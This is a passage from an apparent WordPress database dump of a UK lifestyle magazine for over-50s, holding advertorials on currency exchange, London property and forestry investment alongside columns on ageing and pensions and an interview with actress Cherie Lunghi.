	<span class=\"st_email_buttons\" st_title=\"It pays to secure an exchange rate\" st_url=\"http://westonspirit.org.uk/2012/03/it-pays-to-secure-an-exchange-rate/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"It pays to secure an exchange rate\" st_url=\"http://westonspirit.org.uk/2012/03/it-pays-to-secure-an-exchange-rate/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"It pays to secure an exchange rate\" st_url=\"http://westonspirit.org.uk/2012/03/it-pays-to-secure-an-exchange-rate/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"It pays to secure an exchange rate\" st_url=\"http://westonspirit.org.uk/2012/03/it-pays-to-secure-an-exchange-rate/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"It pays to secure an exchange rate\" st_url=\"http://westonspirit.org.uk/2012/03/it-pays-to-secure-an-exchange-rate/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Ever-changing foreign exchange rates are one thing we can’t predict. But setting a spot rate in advance can secure the transaction amount – whether it’s now or three years down the line</h4>&#13;\n<p>As if there isn’t enough to worry about when you are moving abroad, buying an overseas property or making international money transfers, daily fluctuations in exchange rates can make a huge difference to the amount of money you end up with.</p>&#13;\n<p><img class=\"alignright  wp-image-1594\" title=\"Falling Euro Coins\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/108537940-e1330690355290.jpg\" alt=\"\" width=\"224\" height=\"417\" />Transferring large amounts of money from one currency to another is always risky when the markets are acting up. Fluctuations in the currency pairings can make as much as 10 per cent difference over the course of just a few weeks.</p>&#13;\n<p>Fortunately, there are now ways of protecting against this volatility, to ensure that you know exactly what you’re dealing with in advance.</p>&#13;\n<p>“We can find our clients the very best spot rates (the rate to transfer immediately) or we can secure or fix their exchange rate by using a forward contract,” explains Elisabeth Dobson, head of private clients at the UK’s leading foreign exchange broker, World First.</p>&#13;\n<p>“This means you can set a rate now for a transaction happening up to three years ahead – so there are no nasty surprises on the day you buy your home abroad.</p>&#13;\n<p>“If you need to move money internationally, World First can help. We can make the transfer to and from your UK bank account to your overseas account. And if you’re selling your property, we can bring your money home quickly and safely – using our own overseas accounts if appropriate.”</p>&#13;\n<p>With the markets proving particularly difficult to predict, if you’re planning on moving money overseas anytime soon, it might pay to seek some expert help. World First is the UK’s leading foreign exchange broker.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em>For more information about protecting your overseas payments in advance </em></p>&#13;\n<p><em></em><em>call <strong>020 7801 9080</strong></em></p>&#13;\n<p><strong><em><a title=\"www.worldfirst.com\" href=\"http://www.worldfirst.com/\" target=\"_blank\">www.worldfirst.com</a></em></strong></p>&#13;\n									</div>','It pays to secure an exchange rate','308','publish','open','open','','it-pays-to-secure-an-exchange-rate','','','2018-04-02 20:07:55','2018-04-02 20:07:55','',0,'http://westonspirit.org.uk/it-pays-to-secure-an-exchange-rate.asp',0,'post','',0),(125,1,'2018-03-24 01:31:17','2018-03-24 01:31:17','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/03/letter-from-the-editor-2/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/03/letter-from-the-editor-2/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/03/letter-from-the-editor-2/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/03/letter-from-the-editor-2/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Letter from the editor\" st_url=\"http://westonspirit.org.uk/2012/03/letter-from-the-editor-2/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                	<h4>Over-50s have more to worry about than pensions and wrinkles these days – lovers and lambadas are a high priority, too</h4>&#13;\n<p>When the beautiful actress Cherie Lunghi appeared in Strictly Come Dancing in her mid-50s, she attracted attention as much for her age as for her ballroom prowess.</p>&#13;\n<p>Columnists marvelled at how she could “keep pace with the younger competitors” and match her 30-something partner for “agility”. But the subtext was clear: isn’t she a bit, you know, old for the sequins-and-splits show?</p>&#13;\n<p><img class=\"alignright  wp-image-1578\" title=\"Cartoon p2\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Cartoon-p2.jpg\" alt=\"\" width=\"358\" height=\"320\" />Cherie batted away the snide comments with just as much grace as she executed the samba rolls and botafogos while going backwards in high heels. As she tells Maureen Paton in our interview this month, she has reached that point in her life where she feels comfortable in her own skin. And if other people don’t approve, then so what?</p>&#13;\n<p>What is and what isn’t age-appropriate behaviour seems to tax the brains of some commentators beyond all reason.</p>&#13;\n<p>But one of the major advantages of ageing – celebrity or not – must be the confidence to choose your own way in life without reference to what other people think.</p>&#13;\n<p>Which isn’t to say that age brings all the answers. As writer and former editor of Cosmopolitan, Marcelle D’Argy Smith explores on page 11 what it feels like to hit the dreaded 60s, and how a template for relationships in later life would be very handy indeed.</p>&#13;\n<p>Even with the wisdom conferred by age, love it turns out is as confusing a game as ever.</p>&#13;\n									</div>','Letter from the editor','256','publish','open','open','','letter-from-the-editor-2','','','2018-04-02 20:07:54','2018-04-02 20:07:54','',0,'http://westonspirit.org.uk/letter-from-the-editor-2.asp',0,'post','',0),(126,1,'2015-09-05 20:10:33','2015-09-05 20:10:33','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_buttons\" st_title=\"Safe as houses\" st_url=\"http://westonspirit.org.uk/2012/03/safe-as-houses/\" displaytext=\"share\"></span><span class=\"st_linkedin_buttons\" st_title=\"Safe as houses\" st_url=\"http://westonspirit.org.uk/2012/03/safe-as-houses/\" displaytext=\"share\"></span><span class=\"st_twitter_buttons\" st_title=\"Safe as houses\" st_url=\"http://westonspirit.org.uk/2012/03/safe-as-houses/\" displaytext=\"share\"></span><span class=\"st_facebook_buttons\" st_title=\"Safe as houses\" st_url=\"http://westonspirit.org.uk/2012/03/safe-as-houses/\" displaytext=\"share\"></span><span class=\"st_plusone_buttons\" st_title=\"Safe as houses\" st_url=\"http://westonspirit.org.uk/2012/03/safe-as-houses/\" displaytext=\"share\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>Investing in London property is seen by many as a safe haven. And with prices set to rise by 22 per cent by 2016, one private bank wants to ensure your money is well placed</h4>&#13;\n<p>Residential property has many characteristics that make it a strong asset class over and above more traditional asset classes.</p>&#13;\n<p>Real estate is a tangible and personal asset and buyers tend to have a strong emotional connection with it; this is particularly prevalent when refurbishments have taken place. Furthermore, property is easy to value and unlike some asset classes where it is either capital growth or yield that is obtained, property can generate both, providing a distinct advantage.</p>&#13;\n<p>Location is key to ensuring that the investment provides a strong source of capital appreciation. Alpa Bhakta, head of property finance at Butterfield Private Bank, has been lending to high net-worth individuals buying prime central London property over the past decade.</p>&#13;\n<p>“We have been able to help a number of wealthy individuals secure large mortgages from £1m to £10m for investments in central London which many deem as a ‘safe haven’,” says Bhakta.</p>&#13;\n<p><img class=\"alignright size-full wp-image-1599\" title=\"Butterfield Private Bank\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/93220476.jpg\" alt=\"\" width=\"596\" height=\"355\" />This is supported by the latest figures from the Land Registry, which show house prices across the Royal Borough of Kensington and Chelsea rising by 10.4 per cent last year, whereas UK-wide they fell 2.1 per cent.</p>&#13;\n<p>Bhakta believes there are excellent growth prospects over the next few years, backed by research from Savills that shows prime central London property prices are set to increase 22.7 per cent by 2016. This indicates that top London real estate is an asset class where you can make a good return on equity in the current economic climate.</p>&#13;\n<p>While residential property offers some diversification possibilities, it is still important to ensure your assets are balanced – and if all your assets are in property then it is prudent to identify the key time to divest into other liquid assets. At Butterfield Private Bank, investment specialists work to tailor the requirements of high net-worth individuals to their specific needs, advising on a diverse range of investment strategies dependent on risk appetite.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>020 7776 6700</strong></em></p>&#13;\n<p><em><strong><a title=\"www.uk.butterfieldgroup.com\" href=\"http://www.uk.butterfieldgroup.com/\" target=\"_blank\">www.uk.butterfieldgroup.com</a></strong></em></p>&#13;\n									</div>','Safe as houses','347','publish','open','open','','safe-as-houses','','','2018-04-02 20:07:52','2018-04-02 20:07:52','',0,'http://westonspirit.org.uk/safe-as-houses.asp',0,'post','',0),(127,1,'2016-07-19 12:53:03','2016-07-19 12:53:03','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> hdavies\" title=\"Posts by Hunter Davies\" rel=\"author\"&gt;Hunter Davies</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/03/senior-moment/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/03/senior-moment/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/03/senior-moment/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/03/senior-moment/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Senior moment\" st_url=\"http://westonspirit.org.uk/2012/03/senior-moment/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>I made a vow many years ago never to discuss my health with people younger than me. They don’t want to know. Why should they? It’s boring, dreary, unsettling. You can see them thinking, “He’s old, what does he expect . . .”</h4>&#13;\n<p>I remember thinking the same when I was young, which of course was only yesterday. Old biddies, probably well into their 30s, would sit in the kitchen with my mum and chunter on in low voices about their operations and I would pretend not to hear. But when it comes to my contemporaries, blokes of a similar age, that’s different. I can drone on for ages about the state of my health – knowing they are waiting for a pause in the day’s occupations that is known as the Oldies’ Hour, when they can trot out the latest on their bad back, dodgy hip, prostate problems.</p>&#13;\n<p>Actually, I have none of those probs. Oh no, fine figure of a man. Do I not go swimming three times a week, either at Kentish Town baths when we are in London or Cockermouth pool when we are in Lakeland? Perhaps “fine” is slightly pushing it. I got a new slim Speedo cossie for Christmas and have given up the baggy shorts I have swum in for years. Probably a mistake. It doesn’t, er, flatter my tum, but who cares? It’s my tum. Seen service.</p>&#13;\n<p></p><div id=\"attachment_1697\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1697\" title=\"Oldies’ hour: the ideal timeslot to moan about back pains and the state of society\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/121353328.jpg\" alt=\"\" width=\"596\" height=\"397\" /><p class=\"wp-caption-text\">Oldies’ hour: the ideal timeslot to moan about back pains and the state of society</p></div>&#13;\n<p>I also walk every day for at least an hour. Lots of stops, and I don’t attempt hills any more, because of – how old are you by the way. Please look away if you are under 60. You won’t want to know what follows.</p>&#13;\n<p>I had a new knee seven years ago, which technically worked, as the cement and the glue and sticky tape or whatever it was they used has not exactly fallen out. But the pain if I walk more than half an hour is just as bad as it was before the op. It swells up at the back and front and can be agony, Ivy. The docs say don’t even think of another op – it will be even worse.</p><div class=\"woo-sc-quote\"><p>When it comes to my contemporaries, blokes of a similar age, I can drone on for ages about the state of my health</p></div>&#13;\n<p>So, that’s it. Got to live with it, whistling and smiling and of course pretending I am in ace condition, especially when talking to younger persons around 60 or under, especially those of a female persuasion.</p>&#13;\n<p>I did have asthma as a child, wrecked so many of my early years, but that went with age, hurrah for that. Even more miraculously, I had the most awful arthritis for about 15 years, both sorts, which meant I could not straighten my arms and woke up screaming in the night with the pain, wanting my inflamed ankles and knuckles cut off, at once.</p>&#13;\n<p>I am now on a wonder drug, long name, but the trade name is Humira, which I inject into my tummy every two weeks. Thank God for the Royal Free and the ational Health Service. Right, that’s enough about me. What do you want to do when you grow up? Do tell…</p>&#13;\n									</div>','Senior moment','528','publish','open','open','','senior-moment','','','2018-04-02 20:07:51','2018-04-02 20:07:51','',0,'http://westonspirit.org.uk/senior-moment.asp',0,'post','',0),(129,1,'2018-02-19 23:27:01','2018-02-19 23:27:01','<div class=\"entry\">\r\n<h4>Older and wiser – and taken for granted. I think that fairly sums up our generation.</h4>\r\nTaken for granted by everyone from our children upwards to the government and definitely including the financial services industry.\r\n\r\n&nbsp;\r\n\r\nHaving had to pay mortgage interest of up to 15 per cent for our home loans back in the 1970s, we now subsidise the younger generations’ rock-bottom mortgage rates.\r\n\r\n&nbsp;\r\n\r\nThere is barely any interest on our savings and annuity rates have been slashed because of the impact of quantitative easing on bond rates.\r\n<div class=\"woo-sc-quote\">\r\n\r\nWhy can’t we bring back the original tax-free granny bond now and restrict it to the over-65s?\r\n\r\n</div>\r\n&nbsp;\r\n\r\nOther age groups are feeling the pain, too, but they will have time to recover from the “lost decade” of disposable income forecast by the Institute of Fiscal Studies last November. For many of us, this will be too late. We’ll be dead.\r\n\r\n&nbsp;\r\n\r\nSo I am not ashamed to make a special plea for action in the Budget on 21 March for the pensioner generation – while there is still time for us to benefit.\r\n\r\n&nbsp;\r\n\r\nThere is nothing new in the idea. Launched in 1981, National Savings Index-Linked Retirement Certificates – or “granny bonds” – were originally only for those over 60. Linked to the retail price index and originally with a whopping 5 per cent bonus at maturity, they became available to all in 1984.\r\n\r\n&nbsp;\r\n\r\nNational Savings was effectively forced to close the latest issue of Index- Linked Certificates last September because it was too popular. So why can’t we bring back the original tax-free granny bond now and restrict it to the over-65s?\r\n\r\n&nbsp;\r\n<div id=\"attachment_1660\" class=\"wp-caption alignright\" style=\"width: 606px;\">\r\n\r\n<img class=\"size-full wp-image-1660\" title=\"Tax breaks would give the older and wiser something to shout about\" src=\"/wp-content/uploads/2012/03/87548588-copy.jpg\" sizes=\"(max-width: 596px) 100vw, 596px\" srcset=\"../../../wp-content/uploads/2012/03/87548588-copy.jpg 596w\" alt=\"\" width=\"596\" height=\"526\" />\r\n<p class=\"wp-caption-text\">Tax breaks would give the older and wiser something to shout about</p>\r\n\r\n</div>\r\n&nbsp;\r\n\r\nMeanwhile, the rate of inflation fell last month from 4.8 per cent to 3.9 per cent, but it is still outstripping savings rates. Some 20 or so building societies do have agerelated “silver saver” accounts but the top rates of 2-2.5 per cent – taxable, of course – are usually available on large sums only.\r\n\r\n&nbsp;\r\n\r\nEither that or the headline rate includes a bonus. On to tax and, instead of blethering on about the impact of the 50 per cent tax band on the very wealthy, we should be more concerned about the 50 per cent effective rate of tax regularly paid by many older people.\r\n\r\n&nbsp;\r\n\r\nHere’s what happens. For those aged 65-74, the tax-free personal allowance goes up from the basic £7,475 to £9,940 and for those of 75+ to £10,090. But there’s a sting in the tail. Once their taxable income exceeds £24,000 (in the current tax year) they lose that agerelated allowance at the rate of £1 per £2 of income over that ceiling. A de facto 50 per cent rate.\r\n\r\n&nbsp;\r\n\r\nOnce a pensioner’s income reaches £28,930, the extra allowance has been obliterated and therefore he or she only gets the basic personal allowance of £7,475.\r\n\r\n&nbsp;\r\n\r\nThe figure of £24,000 roughly relates to annual median earnings, but average annual earnings are now over £28,000 a year. As such, it would be a welcome move if the cut-off point for age allowance was, at the very least, raised to that figure. Better still, why not be tidy about it and make it £35,000, where the 40 per cent tax bracket begins?\r\n\r\n&nbsp;\r\n\r\nCome on, Chancellor. Give us a (tax) break.\r\n\r\n&nbsp;\r\n\r\n</div>','The generation game','508','publish','open','open','','the-generation-game','','','2018-04-02 20:21:29','2018-04-02 20:21:29','',0,'http://westonspirit.org.uk/the-generation-game.asp',0,'post','',0),(130,1,'2014-05-10 20:27:13','2014-05-10 20:27:13','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/03/the-near-perfect-asset-2/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/03/the-near-perfect-asset-2/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/03/the-near-perfect-asset-2/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/03/the-near-perfect-asset-2/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"The near perfect asset\" st_url=\"http://westonspirit.org.uk/2012/03/the-near-perfect-asset-2/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                		&#13;\n                	                	<h4>With a track record of consistent growth, forestry is a stable and attractive alternative for forward-thinking investors</h4>&#13;\n<p>If you are one of the millions of people in the UK who are wondering what to do to rescue your pension, or are looking for a high-return investment for your savings plan or family trust, then you may wish to consider a forestry investment.</p>&#13;\n<p>Leading UK forestry investment specialists Ethical Forestry offer a range of investments that are seemingly leaving other companies in the shade.</p>&#13;\n<p><img class=\"alignright  wp-image-1666\" title=\"Ethical Forestry\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Ethical-Forestry.jpg\" alt=\"\" width=\"358\" height=\"477\" />An £18,000 investment over 12 years projects a total return of £104,189, and regular payouts from year four. The products are HMRC-compliant and approved for SIPPs (self-invested personal pension) by a long list of pension trustees who have carried out thorough due diligence before approving them.</p>&#13;\n<p>Sustainable forestry investments ultimately produce valuable timber, a commodity constantly in demand and used globally on a daily basis as a building material, for paper manufacture and as a fuel source.</p>&#13;\n<p>The demand for timber is projected to rise inline with the global population, thus implying a 55 per cent increase by 2050, according to the United Nations. Basic economics tells us that this growing demand, combined with a diminishing supply, will only make this commodity rise exponentially in value.</p>&#13;\n<p>Forestry has a proven track record of producing consistent growth for investors due to a number of simple factors. The first being biological growth. As trees grow they become inherently more valuable.</p>&#13;\n<p>Secondly, the value of timber has historically risen above global inflation and has been the only asset class in existence that has risen in three out of the four market collapses of the 20th century. Combine these factors with the rising global demand and it’s understandable why forestry is regarded as the near perfect asset.</p>&#13;\n<p>As the tumultuous stock market continues to take investors’ money for a nerve-racking ride, thankfully new stable alternative investments such as forestry are providing better investments for forward thinkers in an ever-changing world.</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><strong><em>0800 075 3010</em></strong></p>&#13;\n<p><strong><em><a title=\"www.forestleisure.org.uk\" href=\"http://www.forestleisure.org.uk/\" target=\"_blank\">www.forestleisure.org.uk</a></em></strong></p>&#13;\n									</div>','The near perfect asset','327','publish','open','open','','the-near-perfect-asset-2','','','2018-04-02 20:07:48','2018-04-02 20:07:48','',0,'http://westonspirit.org.uk/the-near-perfect-asset-2.asp',0,'post','',0),(131,1,'2018-01-20 01:37:02','2018-01-20 01:37:02','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"This life Cherie Lunghi\" st_url=\"http://westonspirit.org.uk/2012/03/this-life-cherie-lunghi/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"This life Cherie Lunghi\" st_url=\"http://westonspirit.org.uk/2012/03/this-life-cherie-lunghi/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"This life Cherie Lunghi\" st_url=\"http://westonspirit.org.uk/2012/03/this-life-cherie-lunghi/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"This life Cherie Lunghi\" st_url=\"http://westonspirit.org.uk/2012/03/this-life-cherie-lunghi/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"This life Cherie Lunghi\" st_url=\"http://westonspirit.org.uk/2012/03/this-life-cherie-lunghi/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>From football manager to high-class madam – Cherie Lunghi talks to Maureen Paton</h4>&#13;\n<p>Cherie Lunghi has always been ahead of her time. In a prolific 46-year career, the actress who doesn’t “do sheepish” easily has patented the strong yet feminine type on screen, above all as the first female manager of a professional British football team in the groundbreaking Channel 4 drama The Manageress in 1989.</p>&#13;\n<p>She was hailed as a role model for women again in the late 1990s, playing the flirtatious yet clearly in control boss in the “coffee opera” commercial for Kenco and she reinvented herself still further a decade later as the oldest yet one of the fittest (in both senses) contestants in the 2008 season of Strictly Come Dancing; she became a big hit with the public and lasted an impressive nine weeks.</p><div class=\"woo-sc-quote\"><p>Confidence comes with years. The advantage of age is that you swap youth for wisdom”</p></div>&#13;\n<p>“Strictly was such fun. But as for all those reactions at first about ‘My God, a woman of that age on the show’ – excuse me, hello?” says Cherie, 59. “I did feel I was striking a blow for the older woman by appearing on Strictly, because there are an awful lot of prejudices, preconceptions and ridiculous ideas about age that are not based on what things are really like.</p>&#13;\n<p>“Nowadays 60 is the new 40. We dress and do our hair more youthfully than the generations that went before us; they settled more readily into drabness.”</p>&#13;\n<p><img class=\"alignright  wp-image-1652\" title=\"Lunghi Cherie \" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/Lunghi-Cherie-MAIN.jpg\" alt=\"\" width=\"358\" height=\"447\" />She seems to get even bolder as she gets older, playing a high-class madam and shooting a bondage scene in Secret Diary Of A Call Girl the year before she was approached to do Strictly – part of her strategy of constantly shaking up people’s perceptions of her.</p>&#13;\n<p>“It was great fun to do. My character was indulging her wild side, strung up on a cross in a set designed as an S&amp;M club, and we had such a giggle between takes. I was chatting to all sorts of extras in tattoos, piercings and rubber costumes and learning about these different walks of life. I just thought, ‘I love my job!’”</p>&#13;\n<p>We meet at a coffee shop near her home in Chelsea, London, with Cherie turning up in grey Zara leggings and a silver Whistles top that make her look utterly ageless. A one-time wannabe ballerina, she started dance lessons at four years old with Ballet Rambert. She keeps fit with regular yoga and Pilates as well as walking everywhere and leaping on buses (she can’t wait for her pass for free travel).</p>&#13;\n<p>After making her stage debut at the RSC alongside Judi Dench and Ian McKellen in the 1970s and getting her movie breakthrough as Guinevere alongside Helen Mirren’s Morgana and Liam Neeson’s Gawain in John Boorman’s 1981 Excalibur, she went to live and work in Hollywood for four years before coming back to Britain in the late 1980s because “I wasn’t mad about my daughter Nathalie growing up in her teens in LA”.</p>&#13;\n<p>But she’s now an expert on American accents – handy for her current project, a UK tour of the play Steel Magnolias which provides such strong parts for women of a certain age. Cherie is the feisty widow Clairee, played by Olympia Dukakis in the 1989 film version, with Cheryl Campbell, Denise Welch and Isla Blair taking the Shirley MacLaine, Dolly Parton and Sally Field roles respectively.</p><div class=\"woo-sc-quote\"><p>You begin to see the bigger picture and the interconnectedness of things as you get older”</p></div>&#13;\n<p>“It’s great fun being in an all-female cast; we will probably get giggly,” says Cherie. “When I did the Strictly tour in 2009, the women had a communal dressingroom and there we all were, waiting in line for our spray-tans with our shower caps and paper knickers on. The humour of that girly sisterhood thing can get pretty bawdy.”</p>&#13;\n<p>A single mother, she brought up Nathalie, now a 25-year-old actress, after separating from Nathalie’s father, film director Roland Joffé. She describes herself as “single and really content with that”, largely because of her experience of growing up surrounded by “very strong women”. Her own grandmother had been widowed at 28 and her mother split with her Italian husband when Cherie was just two, raising her with the help of Cherie’s Aunt Mary. Interest in her family history has led to her working with two writers on a film script about her background that she hopes will be produced soon.</p>&#13;\n<p>“You begin to see the bigger picture and the interconnectedness of things as you get older,” she says. “I’m so pleased with the times I’ve lived in and its advances for women; my mother was very bright and could have been a linguist, but like so many of her generation she had to settle for a mundane job because she didn’t have my educational advantages.”</p>&#13;\n<p>There have been times in her life when, she says, she has been “easily intimidated and bullied”, but she is more comfortable in her skin than ever now and is looking forward to turning 60 in April.</p>&#13;\n<p>“I’ve found that confidence comes with years,” she says. “The advantage of age is that you swap youth for wisdom, which is a fair trade-off as far as I’m concerned. I did try Botox for a little while and although it was very nice and made me look as if I didn’t have a care in the world, if I then had to play a character who did have a care in the world, it was difficult! Also, it’s terribly expensive and you’ve got to keep getting it topped up, so I got lazy about it. I thought, ‘To hell with this, I’m in my late 50s, who am I kidding?’”</p><div class=\"woo-sc-hr\"></div>&#13;\n<p><em><strong>Cherie Lunghi</strong> stars in<strong> Steel Magnolias</strong>, which opens at the Theatre Royal Bath on 3 April before touring to Cardiff, Bradford, Nottingham, Brighton, York, Richmond, Birmingham, Newcastle, Southampton and Milton Keynes.</em></p>&#13;\n<p><em>Visit <strong><a title=\"www.seesteelmagnolias.com\" href=\"http://www.seesteelmagnolias.com/\" target=\"_blank\">www.seesteelmagnolias.com</a></strong></em></p>&#13;\n									</div>','This life Cherie Lunghi','979','publish','open','open','','this-life-cherie-lunghi','','','2018-04-02 20:07:46','2018-04-02 20:07:46','',0,'http://westonspirit.org.uk/this-life-cherie-lunghi.asp',0,'post','',0),(132,1,'2017-10-14 23:30:44','2017-10-14 23:30:44','<div class=\"entry\">&#13;\n                	<p class=\"post-meta\">&#13;\n    <span class=\"post-date\">4 March 2017</span>&#13;\n        <span class=\"sep\">•</span>&#13;\n    <span class=\"post-author\"><span class=\"small\">By</span> mdsmith\" title=\"Posts by Marcelle D’argy Smith\" rel=\"author\"&gt;Marcelle D’argy Smith</span>&#13;\n        </p>&#13;\n                							<div class=\"sharethis_top_bar\">&#13;\n                			<span class=\"st_email_hcount\" st_title=\"Welcome to Oldagia\" st_url=\"http://westonspirit.org.uk/2012/03/welcome-to-oldagia/\" displaytext=\"email\"></span><span class=\"st_linkedin_hcount\" st_title=\"Welcome to Oldagia\" st_url=\"http://westonspirit.org.uk/2012/03/welcome-to-oldagia/\" displaytext=\"linkedin\"></span><span st_via=\"MyGetUpAndGo\" st_username=\"MyGetUpAndGo\" class=\"st_twitter_hcount\" st_title=\"Welcome to Oldagia\" st_url=\"http://westonspirit.org.uk/2012/03/welcome-to-oldagia/\" displaytext=\"twitter\"></span><span class=\"st_facebook_hcount\" st_title=\"Welcome to Oldagia\" st_url=\"http://westonspirit.org.uk/2012/03/welcome-to-oldagia/\" displaytext=\"facebook\"></span><span class=\"st_plusone_hcount\" st_title=\"Welcome to Oldagia\" st_url=\"http://westonspirit.org.uk/2012/03/welcome-to-oldagia/\" displaytext=\"plusone\"></span>						</div>&#13;\n                	                	                	<h4>Sixty is old to most people. Most people are 38. It sounded very old to me when it happened. I couldn’t say it. I’d got used to stuttering out “Fffffffffff . . .” for my 40s and 50s. But the hissssssssssss of 60 was hard to pronounce.</h4>&#13;\n<p>It’s senior citizen, weight round your middle, conversations about grandchildren, bad OAP jokes on the internet, memory loss. And the rest. No more getting picked up on planes. Feh. I decided to ignore the whole thing. I’m big on denial.</p>&#13;\n<p>Years later, as I tuck my leggings into my black suede Via Spiga boots and put on my snappy short black coat, I’m unable to kid myself. It now takes me half an hour to get out of the flat and I stood for five minutes at the cheese counter at Waitrose this week trying to remember the word for parmesan.</p>&#13;\n<h3>Fatal attraction</h3>&#13;\n<p>Being older on a bad day is like being airlifted and dumped into another country – Oldagia. You land with a thud, no guidebook, a bus pass and a whacking dent in your sexual attraction. You don’t fancy most men your own age and they don’t fancy you. Ryan Gosling, 31, whom I find unnervingly attractive, would not date me.</p>&#13;\n<p></p><div id=\"attachment_1685\" class=\"wp-caption alignright\" style=\"width: 606px\"><img class=\"size-full wp-image-1685\" title=\"Foreign land: being old is like being left in another country without a phrasebook\" src=\"http://westonspirit.org.uk/wp-content/uploads/2012/03/200205524-001-copy.jpg\" alt=\"\" width=\"596\" height=\"410\" /><p class=\"wp-caption-text\">Foreign land: being old is like being left in another country without a phrasebook</p></div>&#13;\n<p>A friend who went to a 60th birthday “do” said the women had tried hard. Plunge necks, high heels, smart dresses. But the air was thick with the palpable lack of sexual frisson. Mind you, most people were married – and it was in Henley.</p>&#13;\n<p>If you do want a man of this age, may I suggest funerals and memorial services are good places to meet them? Something about sex and death is fundamental and powerful. Reflective men often seize the moment. That’s how two of my friends, dressed in flattering black, met their husbands. Roz said she’d never have met Robin at a party.</p>&#13;\n<p>So am I dressed for Oldagia? Who’s dressed for it?</p>&#13;\n<p>Look in the high street. Endless windows of sleeveless dresses that finish four inches above the knee. Trousers that start four inches below the waist. Can’t Zara make junior and senior citizen lengths? Maybe a Victoria Beckham look where you don’t have to be borderline anorexic to fit into the clothes? Just when I made the effort and got into smart shoes last week – I read plimsolls are the new heels.</p>&#13;\n<p>My 40s and 50s were good and easy – if taken at a frantic pace. A closet gay lover caused grief (he could have mentioned en passant he was gay) but I was slim, clothes fitted, most men I fancied were available. I took the 62 stairs to my flat in Westbourne Grove two at a time and edited Cosmopolitan.</p>&#13;\n<p>While I didn’t hum “I’m glad I’m not young any more” – at least not in the office – I’d decided a bit older had huge advantages over young. I felt attractive – enough. I didn’t have the slab of fat that’s now attached itself to my waistline. I wore a bikini.</p>&#13;\n<p>By my mid-50s (admittedly aided by an 